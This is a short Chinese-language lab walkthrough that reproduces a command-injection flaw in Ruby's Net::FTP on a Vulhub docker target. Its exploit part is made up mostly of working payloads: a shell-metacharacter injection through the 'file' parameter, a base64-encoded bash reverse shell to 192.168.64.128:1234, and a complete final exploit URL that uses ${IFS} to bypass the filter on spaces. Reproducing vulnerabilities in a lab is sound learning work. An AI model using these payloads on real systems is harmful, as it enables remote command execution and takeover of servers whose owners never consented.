Ruby Net::FTP 模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令
思路进入这个ftp客户端(网页有点草率,只能强行说是一个客户端),利用客户端去访问http://your-ip:8080/download?uri=ftp://example.com:2121/&file=vulhub.txt,它会从example.com:2121这个ftp服务端下载文件vulhub.txt到本地(也就是这里出现的漏洞,使用open函数去打开文件),并将内容返回给用户。我们不让它去正常打开文件,而是输入命令让他执行。
复现docker启动靶场
因为需要让客户端成功访问服务端,所有这里还要先搞一个可以被访问的ftp服务端,如果自己网站可以被访问的话直接用就是了,没有的话可以用pyftpdlib启动一个
# 安装pyftpdlib pip install pyftpdlib # 在当前目录下启动一个ftp服务器,默认监听在`0.0.0.0:2121`端口 python3 -m pyftpdlib -p 2121 -i 0.0.0.0
按照提示访问访问抓包
vulhub.yster.live:8080/download?uri=ftp://127.0.0.1:2121/&file=/path/to/file.txt
替换ftp以及后面的命令,这里还要绕过一个空格
/download?uri=ftp:/&file=|touch${IFS}test.txt
进入后台查看
docker exec -itbash ls
对bash进行base64加密
bash -i >& /dev/tcp/192.168.64.128/1234 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjEyOC8xMjM0IDA+JjE=
命令
|bash${IFS}-c${IFS}'{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjEyOC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'
最终
http://vulhub.yster.live:8080/download?uri=ftp://192.168.64.128:2121/&file=|bash${IFS}-c${IFS}%27{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjEyOC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}%27
呜呜呜我也太垃圾了吧
